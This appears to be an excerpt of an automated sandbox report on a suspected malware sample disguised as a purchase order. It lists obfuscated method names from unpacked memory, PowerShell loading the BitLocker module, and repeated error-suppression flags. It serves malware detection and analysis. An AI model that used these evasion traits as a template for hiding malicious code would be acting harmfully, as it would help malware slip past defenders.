Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, yXVWjkwhVF0XdpnNcy.cs	High entropy of concatenated method names: 'rbuVWs0MPQ', 'nU2VM00faf', 'FVUVVcjtdB', 'IchVDF4JJy', 'pJ3VNRsG7l', 'ym7VSpXf7R', 'Dispose', 'BfQ929angQ', 'WJp9FTt8LM', 'war9y8qrUQ'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, L3XNgB8WxtdAWbUg1Q.cs	High entropy of concatenated method names: 'UufKylBB76', 'F31KB7UEEb', 'i7iKYpA7A5', 'ubOKtBOEqF', 'gWJKVdp4aW', 'em2K5mp7mU', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, KK7U2Q4QKPNYjJF1QR.cs	High entropy of concatenated method names: 'CtrVG7ffEH', 'S5RV0UQrWU', 'r0OVlsTjVf', 'JwHVpW6DoP', 'AWhV1GaSfF', 'aV4V6PMvTU', 'vjuVP3JNLW', 'wMFVkWdYAy', 'p8BVT69x04', 'baNVuMNM5y'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, QD4VtECoFGKpc26yn8V.cs	High entropy of concatenated method names: 'OPND8ADHGo', 'nMpDzhnwGk', 'J6mIEHYbyW', 'LsFrJ1Nn1UdvpfdQSw7', 'ClK9SNNzaCpfy8pDEJ1', 'x9aLnvXkq3SB2bMcsdE', 'ODACQYXrpa56V2Cqlsf'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, l7TPuXzT2P3nv8FM1V.cs	High entropy of concatenated method names: 'kGbKc629mX', 'qkuKvDqFPI', 'BlDKr49lD1', 'hJUKGeBRpg', 'p7KK06lq7X', 'Er5KpVWZMq', 'rdkK1ZXfHU', 'NhoKSqeimt', 'XuLK7xKcpT', 'AHqKLxYKQa'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, DHn0pAxRfY5iM001up.cs	High entropy of concatenated method names: 'MMJCtteQjL', 'VvZC5rNfpr', 'frtCiIrCxm', 'sWuCJKUKrO', 'ipbCWNIXLq', 'ISwCaJbZNy', 'tOtjQEHx4eBJysrF1G', 'hTra5pOEWBAF0erxRT', 'HbxCC3MIGl', 'AxaCo1NcSD'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, JghurICx95AZThPieyV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PM0IVAe1ji', 'sFkIKoGJo7', 'N4UIDdlqCP', 'mfmIIJgY4o', 'TEPINM0OkK', 'pfQIsrkSlJ', 'DHGIShEtIP'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, IjN6U8h6ik7gwp5fxi.cs	High entropy of concatenated method names: 'a56MiUBNCG', 'g0uMJQhnxH', 'ToString', 'bKUM2lUZa3', 'do1MF3gMTY', 'TmUMy4chp6', 'd9SMBEVUl1', 'rJqMY7bYHv', 'vW7Mtc0noI', 'UGTM5SkuvK'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, nteQjLvwvZrNfpr2GT.cs	High entropy of concatenated method names: 'vyoFRgk3be', 'TxWFOtFy9Q', 'xTJFmkIckp', 'nTLFhTxt7g', 'vgNFH1CG5n', 'OG1FUijmCh', 'riKFwMaDJN', 'tjdFQXiJpg', 't94F4LZual', 'gomF8y1DKR'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, onb6LVFFkGrpv92kaT.cs	High entropy of concatenated method names: 'Dispose', 'g0XC4dpnNc', 'P3kX0QAXjA', 'ns0LB8qdwM', 'hDgC8w5WNl', 'i4rCzwGApa', 'ProcessDialogKey', 'XP6XEK7U2Q', 'WKPXCNYjJF', 'JQRXXP3XNg'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, mM9P1RCCZ9rkP3k0n1I.cs	High entropy of concatenated method names: 'W9MK8SftDD', 'kajKzlpR9p', 'FJBDE765hM', 'luFDCm0C6I', 'jeCDXWvr1X', 'VYbDoEtclU', 'nCuDxKYqd9', 'rmuDgqLY8x', 'qyqD2ADj3A', 'JGlDFWaAkx'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, UO5h42bOq9LPxoLKQg.cs	High entropy of concatenated method names: 'YYFfvZbNO9', 'siofrpRN0L', 'TUffGoMC3r', 'PYtf00hj12', 'NFbfpO2GnB', 'Kg8f1GOtrf', 'INtfPxRRGQ', 'ADVfkhS8o9', 'UjwfuHLbrt', 'KK1fe8xYbg'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, UKrOAFqUWfor9BpbNI.cs	High entropy of concatenated method names: 'vePB3DxaYQ', 'qbPBngohTI', 'yNnylqr6ge', 'NmdypPnTug', 's78y1D92ov', 'pNYy6hBOtl', 'fj5yPmAo5Z', 'ewmykCRAel', 'FIryTSVhVi', 'hyRyuHLLkZ'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, cLqpSwGJbZNyy3VoUb.cs	High entropy of concatenated method names: 'GDMYg3d8yF', 'GrKYFcSuNC', 'eKiYBNoI3s', 'IDiYt51gLY', 'DvqY5ASca4', 'TGoBHCEa3l', 'N0yBUTOnNV', 'XitBwCIkxF', 'mvHBQFIgJ8', 'kp9B49fONO'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, rrrdeAU4ChMt9kB3np.cs	High entropy of concatenated method names: 'NVmMQAfIKd', 'lxJM8SMQY6', 'mHR9EjeBS2', 'lVO9C3in6u', 'Hr2MekXl0y', 'KN2MdTDCPA', 'yclMbTJQeu', 'WE8MRxiDda', 'AaLMOkLvPT', 'TD8Mm56xRf'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, yr8UpyTtDZyrCyhLOq.cs	High entropy of concatenated method names: 'PqMt7EGEyv', 'YECtLRh9G9', 'cIYtjooILh', 'cLQtAiKHLS', 'ROtt3ThDDK', 'Fbitc9386d', 'nF4tnia7H6', 'LVqtvtrj8p', 'BiUtrbqPN1', 'P1xtqbWgsx'
Source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs	High entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
Source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, vH9V9oD7tIKkmfHnnj.cs	High entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, noPojjR9Pn5xTJrT9R.cs	High entropy of concatenated method names: 'JLWWudGB1e', 'sTeWdncUnC', 'WxQWRgxTq9', 'Cf6WO9NhvJ', 'dPpW0nS4Dk', 'M5ZWldUVNO', 'V1DWpG9bAF', 'sYhW1mBRem', 'zU4W6w5S1F', 'EooWPmSjSl'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, kV0lI2rrtIrCxmKWuK.cs	High entropy of concatenated method names: 'HJryAVM8Nv', 's6DycCk2Jl', 'UByyvp6TDq', 'DefyrDl00H', 'WKJyWXRsdf', 'CREyanhe3p', 't0xyMGhHTD', 'IRIy9F6mfS', 'VwByVFn30E', 'Y1WyKchxqA'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	High entropy of concatenated method names: 'CtfogPOuIl', 'Kgbo2hVwmc', 'ppNoFZATM3', 'gEnoyqwEHj', 'rdhoB30ZJv', 'xmUoYYkdrb', 'MZwotLZWZT', 'GJro586mRi', 'xKDoZ1mhXJ', 'GjEoiFSyCP'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, qfXQtGmpukQKEpK3iy.cs	High entropy of concatenated method names: 'ToString', 'QEsaeniyil', 'Hqma0Y9Oo2', 'qLsaldZAON', 'qUdapcIAih', 'ADfa17pFFv', 'svea6dPGID', 'HGKaPeeL4Z', 'u2nakjbrLJ', 'rf2aTifW6a'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, fTiLHoCEAqncxaWftsR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'enFKeG5OAY', 'kKaKdFJWGB', 'a7jKbkX3qj', 'GW5KR0CnC1', 'tRUKOfpRjy', 'fnSKmSr0hU', 'V65Khr4yE7'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, zWtfYdXOcyqZfalbPR.cs	High entropy of concatenated method names: 'IGNjPLyC4', 'v3dACNbf5', 'IojcAeTeQ', 'UZsnKZ5In', 'pg1rp37OA', 'Qfaqo13qC', 'p1vdLrKiO9xD1yZreq', 'sBShIOC23VmvWpuD5K', 'Rn09lPxHU', 'cQCKvAsqJ'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, yXVWjkwhVF0XdpnNcy.cs	High entropy of concatenated method names: 'rbuVWs0MPQ', 'nU2VM00faf', 'FVUVVcjtdB', 'IchVDF4JJy', 'pJ3VNRsG7l', 'ym7VSpXf7R', 'Dispose', 'BfQ929angQ', 'WJp9FTt8LM', 'war9y8qrUQ'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, L3XNgB8WxtdAWbUg1Q.cs	High entropy of concatenated method names: 'UufKylBB76', 'F31KB7UEEb', 'i7iKYpA7A5', 'ubOKtBOEqF', 'gWJKVdp4aW', 'em2K5mp7mU', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, KK7U2Q4QKPNYjJF1QR.cs	High entropy of concatenated method names: 'CtrVG7ffEH', 'S5RV0UQrWU', 'r0OVlsTjVf', 'JwHVpW6DoP', 'AWhV1GaSfF', 'aV4V6PMvTU', 'vjuVP3JNLW', 'wMFVkWdYAy', 'p8BVT69x04', 'baNVuMNM5y'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, QD4VtECoFGKpc26yn8V.cs	High entropy of concatenated method names: 'OPND8ADHGo', 'nMpDzhnwGk', 'J6mIEHYbyW', 'LsFrJ1Nn1UdvpfdQSw7', 'ClK9SNNzaCpfy8pDEJ1', 'x9aLnvXkq3SB2bMcsdE', 'ODACQYXrpa56V2Cqlsf'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, l7TPuXzT2P3nv8FM1V.cs	High entropy of concatenated method names: 'kGbKc629mX', 'qkuKvDqFPI', 'BlDKr49lD1', 'hJUKGeBRpg', 'p7KK06lq7X', 'Er5KpVWZMq', 'rdkK1ZXfHU', 'NhoKSqeimt', 'XuLK7xKcpT', 'AHqKLxYKQa'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, DHn0pAxRfY5iM001up.cs	High entropy of concatenated method names: 'MMJCtteQjL', 'VvZC5rNfpr', 'frtCiIrCxm', 'sWuCJKUKrO', 'ipbCWNIXLq', 'ISwCaJbZNy', 'tOtjQEHx4eBJysrF1G', 'hTra5pOEWBAF0erxRT', 'HbxCC3MIGl', 'AxaCo1NcSD'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, JghurICx95AZThPieyV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PM0IVAe1ji', 'sFkIKoGJo7', 'N4UIDdlqCP', 'mfmIIJgY4o', 'TEPINM0OkK', 'pfQIsrkSlJ', 'DHGIShEtIP'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, IjN6U8h6ik7gwp5fxi.cs	High entropy of concatenated method names: 'a56MiUBNCG', 'g0uMJQhnxH', 'ToString', 'bKUM2lUZa3', 'do1MF3gMTY', 'TmUMy4chp6', 'd9SMBEVUl1', 'rJqMY7bYHv', 'vW7Mtc0noI', 'UGTM5SkuvK'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, nteQjLvwvZrNfpr2GT.cs	High entropy of concatenated method names: 'vyoFRgk3be', 'TxWFOtFy9Q', 'xTJFmkIckp', 'nTLFhTxt7g', 'vgNFH1CG5n', 'OG1FUijmCh', 'riKFwMaDJN', 'tjdFQXiJpg', 't94F4LZual', 'gomF8y1DKR'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, onb6LVFFkGrpv92kaT.cs	High entropy of concatenated method names: 'Dispose', 'g0XC4dpnNc', 'P3kX0QAXjA', 'ns0LB8qdwM', 'hDgC8w5WNl', 'i4rCzwGApa', 'ProcessDialogKey', 'XP6XEK7U2Q', 'WKPXCNYjJF', 'JQRXXP3XNg'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, mM9P1RCCZ9rkP3k0n1I.cs	High entropy of concatenated method names: 'W9MK8SftDD', 'kajKzlpR9p', 'FJBDE765hM', 'luFDCm0C6I', 'jeCDXWvr1X', 'VYbDoEtclU', 'nCuDxKYqd9', 'rmuDgqLY8x', 'qyqD2ADj3A', 'JGlDFWaAkx'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, UO5h42bOq9LPxoLKQg.cs	High entropy of concatenated method names: 'YYFfvZbNO9', 'siofrpRN0L', 'TUffGoMC3r', 'PYtf00hj12', 'NFbfpO2GnB', 'Kg8f1GOtrf', 'INtfPxRRGQ', 'ADVfkhS8o9', 'UjwfuHLbrt', 'KK1fe8xYbg'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, UKrOAFqUWfor9BpbNI.cs	High entropy of concatenated method names: 'vePB3DxaYQ', 'qbPBngohTI', 'yNnylqr6ge', 'NmdypPnTug', 's78y1D92ov', 'pNYy6hBOtl', 'fj5yPmAo5Z', 'ewmykCRAel', 'FIryTSVhVi', 'hyRyuHLLkZ'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, cLqpSwGJbZNyy3VoUb.cs	High entropy of concatenated method names: 'GDMYg3d8yF', 'GrKYFcSuNC', 'eKiYBNoI3s', 'IDiYt51gLY', 'DvqY5ASca4', 'TGoBHCEa3l', 'N0yBUTOnNV', 'XitBwCIkxF', 'mvHBQFIgJ8', 'kp9B49fONO'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, rrrdeAU4ChMt9kB3np.cs	High entropy of concatenated method names: 'NVmMQAfIKd', 'lxJM8SMQY6', 'mHR9EjeBS2', 'lVO9C3in6u', 'Hr2MekXl0y', 'KN2MdTDCPA', 'yclMbTJQeu', 'WE8MRxiDda', 'AaLMOkLvPT', 'TD8Mm56xRf'
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, yr8UpyTtDZyrCyhLOq.cs	High entropy of concatenated method names: 'PqMt7EGEyv', 'YECtLRh9G9', 'cIYtjooILh', 'cLQtAiKHLS', 'ROtt3ThDDK', 'Fbitc9386d', 'nF4tnia7H6', 'LVqtvtrj8p', 'BiUtrbqPN1', 'P1xtqbWgsx'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
